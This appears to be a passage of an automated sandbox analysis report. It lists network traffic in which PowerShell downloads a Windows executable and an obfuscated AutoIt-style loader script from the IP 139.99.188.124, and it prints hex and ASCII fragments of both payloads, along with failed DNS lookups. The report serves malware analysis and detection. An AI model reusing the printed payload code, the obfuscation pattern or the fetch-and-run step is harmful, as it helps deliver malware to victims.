                                                          Dec 18, 2024 09:32:41.248145103 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.248178005 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.249062061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.249106884 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.249129057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.250029087 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.250080109 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.250159979 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.251245022 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.251291037 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.251377106 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.252438068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.252485037 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.252650023 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.253655910 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.253705025 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.253904104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.254931927 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.254944086 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.254993916 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.256059885 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.256112099 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.256279945 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.257291079 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.257339001 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.257369995 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.258574009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.258620024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.258621931 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.259717941 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.259766102 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.259891987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.260900974 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.260948896 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.260956049 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.262327909 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.262375116 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.262439013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.263442039 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.263489962 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.263511896 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.264544964 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.264591932 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.264616966 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.265656948 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.265700102 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.265784025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.266942024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.266987085 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.267004967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.268131018 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.268181086 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.268209934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.269300938 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.269344091 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.269427061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.270539045 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.270600080 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.270633936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.271733999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.271773100 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.271795988 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.272912025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.272962093 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.273020029 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.274167061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.274240017 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.274275064 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.275357962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.275401115 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.275439024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.276561975 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.276618958 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.276709080 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.277877092 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.277939081 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.278063059 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.279045105 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.279099941 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.279123068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.280137062 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.280183077 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.280246973 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.281359911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.281407118 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.281409979 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.328630924 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.410639048 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.410763025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.410926104 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.411216974 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.411334038 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.411384106 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.412445068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.412492990 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.412538052 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.413651943 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.413762093 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.413808107 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.414849043 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.415028095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.415075064 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.416054010 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.416150093 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.416193962 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.417260885 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.417396069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.417440891 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.418463945 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.418559074 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.418603897 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.419684887 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.419979095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.420023918 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.420835018 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.420972109 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.421020031 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.422106028 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.422245026 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.422286987 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.423425913 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.423513889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.423590899 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.424459934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.424572945 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.424618959 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.425707102 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.469156981 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.652795076 CET4973180192.168.2.4139.99.188.124
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 18, 2024 09:32:43.724416971 CET6311953192.168.2.41.1.1.1
                                                          Dec 18, 2024 09:32:43.863393068 CET53631191.1.1.1192.168.2.4
                                                          Dec 18, 2024 09:32:59.267842054 CET5427553192.168.2.41.1.1.1
                                                          Dec 18, 2024 09:32:59.405594110 CET53542751.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 18, 2024 09:32:43.724416971 CET192.168.2.41.1.1.10x3b0eStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                          Dec 18, 2024 09:32:59.267842054 CET192.168.2.41.1.1.10x9b80Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 18, 2024 09:32:43.863393068 CET1.1.1.1192.168.2.40x3b0eName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                          Dec 18, 2024 09:32:59.405594110 CET1.1.1.1192.168.2.40x9b80Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                          • 139.99.188.124
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449730139.99.188.124807544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 18, 2024 09:32:32.931509972 CET164OUTGET /aiSMo HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 139.99.188.124
                                                          Connection: Keep-Alive
                                                          Dec 18, 2024 09:32:34.390120029 CET1236INHTTP/1.1 200 OK
                                                          Date: Wed, 18 Dec 2024 08:32:32 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                          Last-Modified: Fri, 06 Dec 2024 09:21:58 GMT
                                                          ETag: "da2a8-628968bf31962"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 893608
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*PEL_pZ"@@@@|Ppq; [@.text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                                          Dec 18, 2024 09:32:34.390213013 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 61 4c 00
                                                          Data Ascii: DaLhC\YLhCKYNhC:YhC.Y<ChCYhCYQ>hCYsLQ@sLP9hCYGhC
                                                          Dec 18, 2024 09:32:34.390279055 CET448INData Raw: 46 04 59 83 24 b8 00 47 3b 7e 08 72 e7 ff 76 04 83 66 08 00 e8 bc fb 01 00 59 5f 5e c3 56 8b f1 57 8b 4e 78 85 c9 75 59 8b 46 7c 83 f8 0b 0f 8f 2a a4 03 00 0f 84 0a a4 03 00 83 e8 05 74 4e 83 e8 03 0f 84 df a3 03 00 48 48 0f 84 bd a3 03 00 83 66
                                                          Data Ascii: FY$G;~rvfY_^VWNxuYF|*tNHHfpNTF|N$NV\Y_^QfxNptQ,SV3WN~^^^N$NT^4^8^<^@^D~H~L^P^d^h^p^x
                                                          Dec 18, 2024 09:32:34.390295982 CET1236INData Raw: c0 74 15 56 8b 75 08 57 8b f8 a5 a5 a5 5f 5e 89 03 8b c3 5b 5d c2 04 00 33 c0 eb f3 55 8b ec 5d e9 64 06 00 00 55 8b ec 83 ec 18 b9 b0 77 4c 00 56 8b 75 08 57 56 e8 60 13 00 00 8b 0d 10 78 4c 00 8b 04 81 8b 38 83 7f 14 00 75 2f 3b 75 0c 0f 84 9b
                                                          Data Ascii: tVuW_^[]3U]dUwLVuWV`xL8u/;uEEQuj VI_^]we3@UW}tVu9=txLdxLEeepxL=txL5xxL}uejjMQPVIPudxL
                                                          Dec 18, 2024 09:32:34.390469074 CET1236INData Raw: 75 0c ff 75 fc e8 5c 0a 00 00 5e 5b 8b e5 5d c2 10 00 83 78 48 ff 75 e6 56 ff 75 0c 68 38 01 00 00 e9 31 a0 03 00 55 8b ec 83 e4 f8 83 ec 5c 53 56 57 ff 75 08 b9 b0 77 4c 00 e8 88 0e 00 00 8b 0d 10 78 4c 00 8b 04 81 8b 18 8d 44 24 28 50 89 5c 24
                                                          Data Ascii: uu\^[]xHuVuh81U\SVWuwLxLD$(P\$30IF%hxLD$%dxLtxLxxLlxLpxLPF0ID$D$D$D$D$P3pIjt$t$W0I
                                                          Dec 18, 2024 09:32:34.390485048 CET1236INData Raw: 14 51 68 80 09 49 00 68 70 09 49 00 50 ff 75 08 e8 0d 01 00 00 8b 75 0c 89 06 85 c0 0f 84 82 00 00 00 8b 45 14 83 4e 4c ff 66 89 86 88 00 00 00 8b 45 18 68 10 09 00 00 66 89 86 8a 00 00 00 66 89 9e 8c 00 00 00 66 89 be 8e 00 00 00 e8 a5 ef 01 00
                                                          Data Ascii: QhIhpIPuuENLfEhfffU3Yxxp8t99u1f_^[]$JO2UEVW3F98u[FE=%~E7tEDED
                                                          Dec 18, 2024 09:32:34.390501022 CET1236INData Raw: 00 00 8b 0d 34 78 4c 00 8b 55 fc 42 89 55 fc 3b d1 0f 8e 56 ff ff ff 8b 75 08 83 7f 20 00 0f 85 bb 9b 03 00 83 7f 24 00 0f 85 bf 9b 03 00 8b 15 10 78 4c 00 8b 04 b2 8b 08 85 c9 74 0c 51 e8 ea eb ff ff 8b 15 10 78 4c 00 8b 04 b2 83 20 00 8b 15 d0
                                                          Data Ascii: 4xLUBU;Vu $xLtQxL wLJwL;5xLuxLxL_^u5wLRI%wLxLtxLD8uxL]UMxLSVWwLu]jE(I
                                                          Dec 18, 2024 09:32:34.390517950 CET1236INData Raw: 8b f8 eb ac 83 c8 ff eb c3 33 ff eb 85 46 3b f1 7c d1 eb d6 55 8b ec 56 8b 75 08 57 8b f9 85 f6 74 24 6a eb 56 ff 15 5c 06 49 00 3b 47 78 73 16 8b 4f 74 8b 0c 81 8b 09 85 c9 74 0a 39 31 75 06 5f 5e 5d c2 04 00 83 c8 ff eb f5 55 8b ec 56 8b 75 08
                                                          Data Ascii: 3F;|UVuWt$jV\I;GxsOtt91u_^]UVuWt$jV\I;GdsO`t91u_^]UQS3wLV3wL@wLWwLwLwLwLwLwLwL=wLwLwLwLwLj^
                                                          Dec 18, 2024 09:32:34.390594006 CET1236INData Raw: b5 96 03 00 8b 7d 08 83 ff 08 0f 8f eb 96 03 00 74 1a 85 ff 74 64 83 ff 01 74 11 83 ff 02 74 51 83 ff 03 74 43 7e 29 83 ff 05 7f 31 80 7e 38 00 75 56 57 51 ff 15 1c 07 49 00 83 ff 08 74 0d 83 ff 04 74 08 ff 75 0c e8 23 30 01 00 c6 46 38 01 33 c0
                                                          Data Ascii: }ttdttQtC~)1~8uVWQIttu#0F83@^_]3}F8F8iRQIF83U}xLt/UBw$xLu\e3@]3UQQ}xLtt}
                                                          Dec 18, 2024 09:32:34.390609980 CET1236INData Raw: f1 75 16 8b 4e 6c 8b 46 60 5e 8b 04 88 8b 00 66 c7 40 68 00 00 5d c2 04 00 ff 75 08 e8 82 f6 ff ff 89 46 6c eb dd 55 8b ec 51 51 8d 45 fc b9 b0 77 4c 00 50 8d 45 f8 50 ff 75 08 e8 53 f4 ff ff 84 c0 74 4b 8b 4d fc a1 24 78 4c 00 57 8b 04 88 8b 38
                                                          Data Ascii: uNlF`^f@h]uFlUQQEwLPEPuStKM$xLW8u8S]Cw03@$3@juuSW3@[_] 333I3@3@CCCC3@U@xrLV3xLjE0E+
                                                          Dec 18, 2024 09:32:34.510024071 CET1236INData Raw: 14 3b c1 7c 06 7f 17 3b df 73 13 5f 8b c6 5e 5b 8b e5 5d c3 dd d9 33 c0 dd d8 33 d2 eb f2 83 c6 01 83 d2 00 eb e5 56 8b f1 57 80 7e 09 00 0f 85 cc 9a 03 00 80 7e 08 00 75 2f 8b 7e 04 53 8b 5f 30 85 ff 74 17 8d 4f 20 e8 60 15 00 00 8d 4f 10 e8 58
                                                          Data Ascii: ;|;s_^[]33VW~~u/~S_0tO `OXWY^F[_^FyAu@0UV~Wj8>Ytu,FG0~_^]3Lu!5xLxLI5pLpL9VDU


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449731139.99.188.124807760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 18, 2024 09:32:37.486903906 CET74OUTGET /ucZfzm.txt HTTP/1.1
                                                          Host: 139.99.188.124
                                                          Connection: Keep-Alive
                                                          Dec 18, 2024 09:32:38.999053955 CET1236INHTTP/1.1 200 OK
                                                          Date: Wed, 18 Dec 2024 08:32:37 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                          Last-Modified: Fri, 06 Dec 2024 09:21:58 GMT
                                                          ETag: "130a62-628968bf2f250"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1247842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/plain
                                                          Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 4f 64 48 42 74 20 3d 20 32 38 20 54 6f 20 38 36 35 0a 49 66 20 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 32 20 54 68 65 6e 0a 53 71 72 74 28 37 39 35 35 29 0a 46 69 6c 65 45 78 69 73 74 73 28 [TRUNCATED]
                                                          Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $OdHBt = 28 To 865If $VerifiedUnderstoodValidation = 32 ThenSqrt(7955)FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUnderstoodValidation = 33 ThenConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUndersto
                                                          Dec 18, 2024 09:32:38.999083042 CET1236INData Raw: 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 20 54 68 65 6e 0a 24 4e 75 74 74 65 6e 49 6e 76 65 73 74 6f 72 73 52 61 6c 65 69 67 68 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 30 34 5d 31 31 33 5d 31 30 35 5d 38 36 5d 38 35 5d 39 36 5d 38
                                                          Data Ascii: odValidation = 34 Then$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]83]73]78]127]105]97]79]105]77",28/4))ExitLoopEndIfNext$LAYERSSTRICTINNOVATIVE = '66150718350940696046327902621'$DmModsQueries = 68$DRESSDEARANTIQUES = 93Wh
                                                          Dec 18, 2024 09:32:38.999105930 CET1236INData Raw: 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 3d 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61
                                                          Data Ascii: lLibrarianSpiritU = $TheoreticalLibrarianSpiritU + 1EndIfIf $TheoreticalLibrarianSpiritU = 18 Then$locateheadquarterssuccessfully = PixelGetColor(Wales("82]124]123]88]85]72]105]73]102]127]126]82]119",5/1), Wales("82]124]123]88]85]72]105]73]
                                                          Dec 18, 2024 09:32:38.999212027 CET1236INData Raw: 37 29 29 0a 41 53 69 6e 28 39 39 32 29 0a 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 3d 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65
                                                          Data Ascii: 7))ASin(992)$missionsgreenhouse = $missionsgreenhouse + 1EndIfIf $missionsgreenhouse = 96 Then$broughtisnicholasearned = ASin(9631)ExitLoopEndIfIf $missionsgreenhouse = 97 ThenDriveStatus(Wales("87]120]118]101]109]107]108]120]39",24/6
                                                          Dec 18, 2024 09:32:38.999222994 CET1236INData Raw: 38 32 30 39 32 34 34 35 32 39 39 32 31 34 37 37 33 30 37 33 33 38 33 32 39 35 39 38 31 37 38 33 37 31 39 31 34 39 36 37 34 34 35 38 38 30 38 27 0a 24 44 49 4c 44 4f 53 59 49 45 4c 44 53 46 41 52 45 41 44 44 52 45 53 53 45 44 20 3d 20 33 36 0a 24
                                                          Data Ascii: 82092445299214773073383295981783719149674458808'$DILDOSYIELDSFAREADDRESSED = 36$PERFECTRYAN = 64For $mdowmhS = 37 To 500If $DILDOSYIELDSFAREADDRESSED = 35 ThenPixelGetColor(107, 354, 0)Dec(Wales("76]97]107]101]115]42]73]110]115]116]97]11
                                                          Dec 18, 2024 09:32:38.999265909 CET1236INData Raw: 38 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 39 33 5d 31 31 37 5d 31 32 33 5d 31 31 36 5d 31 30 36 5d 35 33 22 2c 33 30 2f 35 29 29 0a 43 68 72 28 38 37 37 39 29 0a 24 4c 65 73 73 50 68 6f 6e 65 20 3d 20 24 4c 65 73 73 50 68
                                                          Data Ascii: 8)DriveStatus(Wales("93]117]123]116]106]53",30/5))Chr(8779)$LessPhone = $LessPhone + 1EndIfIf $LessPhone = 28 Then$adipexeditcarl = DriveStatus(Wales("79]104]75]82]80]116]89]86]125]114]75]75]81]125]90]115]95]79]128",56/8))ExitLoopEndIf
                                                          Dec 18, 2024 09:32:38.999366999 CET1236INData Raw: 73 74 65 64 44 69 65 44 6f 63 73 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 54 61 62 6c 65 44 69 73 63 75 73 73 65 73 52 61 70 69 64 6c 79 48 69 73 74 6f 72 69 63 61 6c 20 3d 20 27 39 38 37 37 37 39 35 31 33 37 30 34 33 31 35 32 31 31 36
                                                          Data Ascii: stedDieDocs + 1EndIfWEnd$TableDiscussesRapidlyHistorical = '9877795137043152116883331283765251278672396181174893270'$COACHCELLULAR = 24$AIMEDSENZSHOPSMIXER = 90For $hIEQQvE = 18 To 472If $COACHCELLULAR = 23 ThenACos(2564)Chr(8142)ASi
